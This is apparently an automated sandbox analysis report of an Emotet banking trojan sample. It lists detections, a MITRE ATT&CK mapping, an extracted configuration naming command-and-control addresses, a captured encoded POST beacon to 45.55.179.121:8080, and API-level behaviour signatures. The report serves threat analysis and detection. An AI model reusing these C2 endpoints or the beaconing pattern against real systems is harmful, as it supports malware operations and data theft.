Loading ...

Play interactive tourEdit tour

Analysis Report 3ki05193698.exe.vir

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:206247
Start date:06.02.2020
Start time:03:16:41
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 9m 11s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:3ki05193698.exe.vir (renamed file extension from vir to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:8
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winEXE@6/0@0/1
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 61.5% (good quality ratio 59.5%)
  • Quality average: 82.2%
  • Quality standard deviation: 26.4%
HCA Information:
  • Successful, ratio: 75%
  • Number of executed functions: 44
  • Number of non-executed functions: 448
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, CompatTelRunner.exe
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Emotet
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Execution through API131Hidden Files and Directories1Valid Accounts1Disabling Security Tools1Input Capture2System Time Discovery2Remote File Copy1Input Capture2Data Encrypted11Uncommonly Used Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
Replication Through Removable MediaCommand-Line Interface2Valid Accounts1Access Token Manipulation1Software Packing1Network SniffingSecurity Software Discovery21Remote ServicesData from Removable MediaExfiltration Over Other Network MediumCommonly Used Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesService Execution12Modify Existing Service11Process Injection1Deobfuscate/Decode Files or Information1Input CaptureSystem Service Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationRemote File Copy1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseScheduled TaskNew Service2New Service2File Deletion1Credentials in FilesFile and Directory Discovery2Logon ScriptsInput CaptureData EncryptedStandard Cryptographic Protocol2SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessObfuscated Files or Information2Account ManipulationSystem Information Discovery36Shared WebrootData StagedScheduled TransferStandard Non-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceMasquerading12Brute ForceProcess Discovery2Third-party SoftwareScreen CaptureData Transfer Size LimitsStandard Application Layer Protocol11Jamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskHidden Files and Directories1Two-Factor Authentication InterceptionApplication Window Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionValid Accounts1Bash HistoryNetwork Service ScanningRemote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessAccess Token Manipulation1Input PromptSystem Network Connections DiscoveryWindows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationProcess Injection1KeychainProcess DiscoveryTaint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for sampleShow sources
Source: 3ki05193698.exe.exeAvira: detection malicious, Label: TR/AD.Emotet.lnvbd
Found malware configurationShow sources
Source: driverthunk.exe.1836.4.memstrMalware Configuration Extractor: Emotet {"C2 list": ["45.55.179.121/GfGV9Yv", "45.55.179.121:8080", "5.55.179.121:8080"]}
Multi AV Scanner detection for submitted fileShow sources
Source: 3ki05193698.exe.exeVirustotal: Detection: 77%Perma Link
Machine Learning detection for sampleShow sources
Source: 3ki05193698.exe.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 4.0.driverthunk.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.lnvbd
Source: 0.0.3ki05193698.exe.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.lnvbd
Source: 2.0.3ki05193698.exe.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.lnvbd
Source: 3.0.driverthunk.exe.400000.0.unpackAvira: Label: TR/AD.Emotet.lnvbd

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F51FFC CryptGenKey,CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,4_2_00F51FFC
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F51F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,4_2_00F51F75
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F5207B CryptDuplicateHash,CryptEncrypt,CryptDestroyHash,4_2_00F5207B
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F51F56 CryptGetHashParam,4_2_00F51F56
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F5215A CryptDuplicateHash,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,4_2_00F5215A
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F51F11 CryptExportKey,4_2_00F51F11

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_004305BD lstrlenA,FindFirstFileA,FindClose,0_2_004305BD
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0042885D __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,0_2_0042885D
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_004305BD lstrlenA,FindFirstFileA,FindClose,2_2_004305BD
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0042885D __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,2_2_0042885D

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2404332 ET CNC Feodo Tracker Reported CnC Server TCP group 17 192.168.2.5:49765 -> 45.55.179.121:8080
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.5:49765 -> 45.55.179.121:8080
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /GfGV9Yv HTTP/1.1Referer: http://45.55.179.121/GfGV9YvContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.55.179.121:8080Content-Length: 630Connection: Keep-AliveCache-Control: no-cacheData Raw: 47 66 47 56 39 59 76 3d 6e 64 42 25 32 46 25 32 42 47 38 47 33 31 6f 71 31 75 65 64 39 6b 39 4c 37 25 32 46 53 41 54 4e 65 79 4d 6f 6a 58 35 71 6b 4c 69 77 6d 25 32 42 51 4a 58 66 59 45 32 61 54 43 41 64 50 49 47 5a 59 41 41 25 32 42 73 78 39 4a 57 70 66 6b 76 48 68 58 49 4f 43 6b 25 32 42 39 4f 25 32 42 55 72 30 67 38 46 71 39 78 74 25 32 46 4b 75 6e 74 67 69 33 62 57 78 77 6e 45 7a 6d 71 7a 4c 48 66 67 36 44 34 37 42 41 4f 76 48 63 43 77 53 53 67 66 6c 55 79 63 4c 6e 64 39 4d 33 6d 67 66 30 57 43 62 69 32 6c 76 53 77 41 6c 67 48 5a 34 4b 30 6f 4a 44 4e 43 70 57 6c 6f 33 73 25 32 46 64 44 66 72 78 66 35 67 53 76 54 5a 35 4f 4f 46 5a 6b 42 47 4f 71 41 25 32 42 57 48 33 64 51 48 55 79 25 32 42 4f 38 35 73 38 4e 50 76 44 34 55 66 70 74 52 53 57 35 4a 76 4c 75 79 76 77 30 38 4e 66 79 4a 61 61 46 6d 77 25 32 46 51 50 33 67 66 71 5a 31 57 4a 68 70 49 52 49 25 32 46 4b 36 46 54 57 5a 66 45 37 58 4f 46 6c 38 33 30 52 53 49 73 34 35 39 66 76 43 52 30 63 30 48 41 5a 62 43 77 34 52 32 74 70 6b 34 44 4f 6e 4a 42 68 67 77 49 6b 6f 41 50 56 36 53 62 49 4c 59 74 69 65 62 39 6d 49 4e 5a 74 56 70 77 33 64 4c 4b 65 36 59 75 6b 49 48 55 33 4e 45 41 6d 41 33 68 25 32 46 52 63 5a 4a 45 72 58 68 71 51 65 36 31 47 39 48 30 47 6b 7a 48 71 39 75 72 6c 62 64 55 49 67 37 68 70 57 59 57 62 58 50 50 62 30 31 78 74 59 39 39 56 62 69 66 59 38 64 32 65 49 71 52 45 56 36 47 31 71 4d 52 73 4d 76 42 62 37 5a 47 53 4e 5a 65 25 32 46 38 46 73 55 6a 42 6d 62 38 64 38 4b 73 4d 44 70 6a 6a 6e 77 72 64 7a 67 77 6a 53 25 32 46 71 70 35 61 64 63 51 4a 58 6f 79 71 76 52 38 59 4f 36 43 50 5a 7a 48 42 54 72 59 6a 79 6e 7a 70 4e 62 4a 62 61 51 61 67 59 44 48 71 47 39 49 68 36 44 6a 43 61 6c 6c 6e 52 57 6b 54 6b 62 50 61 6e 54 56 74 42 7a 74 46 6c 45 6e 30 64 49 58 51 58 30 6b 73 75 6a 33 68 50 38 51 76 53 64 6e 75 6b 45 47 73 74 76 55 49 42 69 6a 31 36 7a 4c 6b 69 38 25 32 42 41 4a 67 25 33 44 25 33 44 Data Ascii: GfGV9Yv=ndB%2F%2BG8G31oq1ued9k9L7%2FSATNeyMojX5qkLiwm%2BQJXfYE2aTCAdPIGZYAA%2Bsx9JWpfkvHhXIOCk%2B9O%2BUr0g8Fq9xt%2FKuntgi3bWxwnEzmqzLHfg6D47BAOvHcCwSSgflUycLnd9M3mgf0WCbi2lvSwAlgHZ4K0oJDNCpWlo3s%2FdDfrxf5gSvTZ5OOFZkBGOqA%2BWH3dQHUy%2BO85s8NPvD4UfptRSW5JvLuyvw08NfyJaaFmw%2FQP3gfqZ1WJhpIRI%2FK6FTWZfE7XOFl830RSIs459fvCR0c0HAZbCw4R2tpk4DOnJBhgwIkoAPV6SbILYtieb9mINZtVpw3dLKe6YukIHU3NEAmA3h%2FRcZJErXhqQe61G9H0GkzHq9urlbdUIg7hpWYWbXPPb01xtY99VbifY8d2eIqREV6G1qMRsMvBb7ZGSNZe%2F8FsUjBmb8d8KsMDpjjnwrdzgwjS%2Fqp5adcQJXoyqvR8YO6CPZzHBTrYjynzpNbJbaQagYDHqG9Ih6DjCallnRWkTkbPanTVtBztFlEn0dIXQX0ksuj3hP8QvSdnukEGstvUIBij16zLki8%2BAJg%3D%3D
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Source: unknownTCP traffic detected without corresponding DNS query: 45.55.179.121
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F51383 InternetReadFile,4_2_00F51383
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /GfGV9Yv HTTP/1.1Referer: http://45.55.179.121/GfGV9YvContent-Type: application/x-www-form-urlencodedDNT: 1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 45.55.179.121:8080Content-Length: 630Connection: Keep-AliveCache-Control: no-cacheData Raw: 47 66 47 56 39 59 76 3d 6e 64 42 25 32 46 25 32 42 47 38 47 33 31 6f 71 31 75 65 64 39 6b 39 4c 37 25 32 46 53 41 54 4e 65 79 4d 6f 6a 58 35 71 6b 4c 69 77 6d 25 32 42 51 4a 58 66 59 45 32 61 54 43 41 64 50 49 47 5a 59 41 41 25 32 42 73 78 39 4a 57 70 66 6b 76 48 68 58 49 4f 43 6b 25 32 42 39 4f 25 32 42 55 72 30 67 38 46 71 39 78 74 25 32 46 4b 75 6e 74 67 69 33 62 57 78 77 6e 45 7a 6d 71 7a 4c 48 66 67 36 44 34 37 42 41 4f 76 48 63 43 77 53 53 67 66 6c 55 79 63 4c 6e 64 39 4d 33 6d 67 66 30 57 43 62 69 32 6c 76 53 77 41 6c 67 48 5a 34 4b 30 6f 4a 44 4e 43 70 57 6c 6f 33 73 25 32 46 64 44 66 72 78 66 35 67 53 76 54 5a 35 4f 4f 46 5a 6b 42 47 4f 71 41 25 32 42 57 48 33 64 51 48 55 79 25 32 42 4f 38 35 73 38 4e 50 76 44 34 55 66 70 74 52 53 57 35 4a 76 4c 75 79 76 77 30 38 4e 66 79 4a 61 61 46 6d 77 25 32 46 51 50 33 67 66 71 5a 31 57 4a 68 70 49 52 49 25 32 46 4b 36 46 54 57 5a 66 45 37 58 4f 46 6c 38 33 30 52 53 49 73 34 35 39 66 76 43 52 30 63 30 48 41 5a 62 43 77 34 52 32 74 70 6b 34 44 4f 6e 4a 42 68 67 77 49 6b 6f 41 50 56 36 53 62 49 4c 59 74 69 65 62 39 6d 49 4e 5a 74 56 70 77 33 64 4c 4b 65 36 59 75 6b 49 48 55 33 4e 45 41 6d 41 33 68 25 32 46 52 63 5a 4a 45 72 58 68 71 51 65 36 31 47 39 48 30 47 6b 7a 48 71 39 75 72 6c 62 64 55 49 67 37 68 70 57 59 57 62 58 50 50 62 30 31 78 74 59 39 39 56 62 69 66 59 38 64 32 65 49 71 52 45 56 36 47 31 71 4d 52 73 4d 76 42 62 37 5a 47 53 4e 5a 65 25 32 46 38 46 73 55 6a 42 6d 62 38 64 38 4b 73 4d 44 70 6a 6a 6e 77 72 64 7a 67 77 6a 53 25 32 46 71 70 35 61 64 63 51 4a 58 6f 79 71 76 52 38 59 4f 36 43 50 5a 7a 48 42 54 72 59 6a 79 6e 7a 70 4e 62 4a 62 61 51 61 67 59 44 48 71 47 39 49 68 36 44 6a 43 61 6c 6c 6e 52 57 6b 54 6b 62 50 61 6e 54 56 74 42 7a 74 46 6c 45 6e 30 64 49 58 51 58 30 6b 73 75 6a 33 68 50 38 51 76 53 64 6e 75 6b 45 47 73 74 76 55 49 42 69 6a 31 36 7a 4c 6b 69 38 25 32 42 41 4a 67 25 33 44 25 33 44 Data Ascii: GfGV9Yv=ndB%2F%2BG8G31oq1ued9k9L7%2FSATNeyMojX5qkLiwm%2BQJXfYE2aTCAdPIGZYAA%2Bsx9JWpfkvHhXIOCk%2B9O%2BUr0g8Fq9xt%2FKuntgi3bWxwnEzmqzLHfg6D47BAOvHcCwSSgflUycLnd9M3mgf0WCbi2lvSwAlgHZ4K0oJDNCpWlo3s%2FdDfrxf5gSvTZ5OOFZkBGOqA%2BWH3dQHUy%2BO85s8NPvD4UfptRSW5JvLuyvw08NfyJaaFmw%2FQP3gfqZ1WJhpIRI%2FK6FTWZfE7XOFl830RSIs459fvCR0c0HAZbCw4R2tpk4DOnJBhgwIkoAPV6SbILYtieb9mINZtVpw3dLKe6YukIHU3NEAmA3h%2FRcZJErXhqQe61G9H0GkzHq9urlbdUIg7hpWYWbXPPb01xtY99VbifY8d2eIqREV6G1qMRsMvBb7ZGSNZe%2F8FsUjBmb8d8KsMDpjjnwrdzgwjS%2Fqp5adcQJXoyqvR8YO6CPZzHBTrYjynzpNbJbaQagYDHqG9Ih6DjCallnRWkTkbPanTVtBztFlEn0dIXQX0ksuj3hP8QvSdnukEGstvUIBij16zLki8%2BAJg%3D%3D
Urls found in memory or binary dataShow sources
Source: driverthunk.exe, 00000004.00000002.2793127886.00000000006B1000.00000004.00000001.sdmpString found in binary or memory: http://45.55.179.121/GfGV9Yv
Source: driverthunk.exe, 00000004.00000002.2793127886.00000000006B1000.00000004.00000001.sdmpString found in binary or memory: http://45.55.179.121:8080/GfGV9Yv
Source: driverthunk.exe, 00000004.00000002.2793045507.0000000000670000.00000004.00000020.sdmpString found in binary or memory: http://45.55.179.121:8080/GfGV9Yve
Source: driverthunk.exe, 00000004.00000002.2793127886.00000000006B1000.00000004.00000001.sdmpString found in binary or memory: http://45.55.179.121:8080/GfGV9Yvv
Source: 3ki05193698.exe.exeString found in binary or memory: http://www.codeproject.com/KB/dialog/xfontdialog.aspx

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)Show sources
Source: 3ki05193698.exe.exe, 00000000.00000002.1999644391.0000000000760000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Potential key logger detected (key state polling based)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0042E2A5 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,0_2_0042E2A5
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0041A743 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,0_2_0041A743
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0041501F GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0041501F
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00409DC5 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00409DC5
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00431EC2 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,0_2_00431EC2
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00437FA6 GetKeyState,GetKeyState,GetKeyState,0_2_00437FA6
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0042E2A5 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,2_2_0042E2A5
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0041A743 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,2_2_0041A743
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0041501F GetKeyState,GetKeyState,GetKeyState,GetKeyState,2_2_0041501F
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00409DC5 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,2_2_00409DC5
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00431EC2 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,2_2_00431EC2
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00437FA6 GetKeyState,GetKeyState,GetKeyState,2_2_00437FA6

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F5E20C4_2_00F5E20C
Yara detected EmotetShow sources
Source: Yara matchFile source: 00000002.00000002.2031798136.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1999620941.0000000000740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.2792994904.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.2029903542.0000000000601000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.2029828683.00000000004A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.2793212106.0000000000F51000.00000020.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.2031865725.00000000006A1000.00000020.00000001.sdmp, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F51F75 CryptAcquireContextW,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptReleaseContext,4_2_00F51F75

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000000.00000002.1999763726.0000000002281000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000002.00000002.2031798136.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000000.00000002.1999620941.0000000000740000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000004.00000002.2792994904.0000000000640000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000003.00000002.2029903542.0000000000601000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000003.00000002.2029828683.00000000004A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000004.00000002.2793212106.0000000000F51000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Source: 00000002.00000002.2031865725.00000000006A1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet Payload Author: kevoreilly
Contains functionality to delete servicesShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F5E3D8 GetModuleFileNameW,lstrlenW,OpenServiceW,DeleteService,CloseServiceHandle,4_2_00F5E3D8
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F51D2B CreateProcessAsUserW,CreateProcessW,4_2_00F51D2B
Creates files inside the system directoryShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
Deletes files inside the Windows folderShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeFile deleted: C:\Windows\SysWOW64\driverthunk.exe:Zone.IdentifierJump to behavior
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0045400D0_2_0045400D
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0044A0900_2_0044A090
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_004601D20_2_004601D2
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0044C59A0_2_0044C59A
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_004607160_2_00460716
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00446BF60_2_00446BF6
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0043CDE80_2_0043CDE8
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00460D860_2_00460D86
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_004610010_2_00461001
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0043D2BD0_2_0043D2BD
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_004613060_2_00461306
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0045B40D0_2_0045B40D
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0045B60B0_2_0045B60B
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0044D6210_2_0044D621
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0043D6910_2_0043D691
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00461ACA0_2_00461ACA
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00423AE80_2_00423AE8
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0043DA9D0_2_0043DA9D
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00463B1C0_2_00463B1C
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00457C430_2_00457C43
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0045FCA70_2_0045FCA7
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0040BDDB0_2_0040BDDB
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0043DEBD0_2_0043DEBD
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_007428C10_2_007428C1
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_007430E40_2_007430E4
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_007430E80_2_007430E8
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_02282F820_2_02282F82
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_022837A90_2_022837A9
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_022837A50_2_022837A5
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0045400D2_2_0045400D
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0044A0902_2_0044A090
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_004601D22_2_004601D2
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0044C59A2_2_0044C59A
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_004607162_2_00460716
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00446BF62_2_00446BF6
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0043CDE82_2_0043CDE8
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00460D862_2_00460D86
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_004610012_2_00461001
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0043D2BD2_2_0043D2BD
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_004613062_2_00461306
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0045B40D2_2_0045B40D
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0045B60B2_2_0045B60B
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0044D6212_2_0044D621
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0043D6912_2_0043D691
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00461ACA2_2_00461ACA
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00423AE82_2_00423AE8
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0043DA9D2_2_0043DA9D
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00463B1C2_2_00463B1C
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00457C432_2_00457C43
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0045FCA72_2_0045FCA7
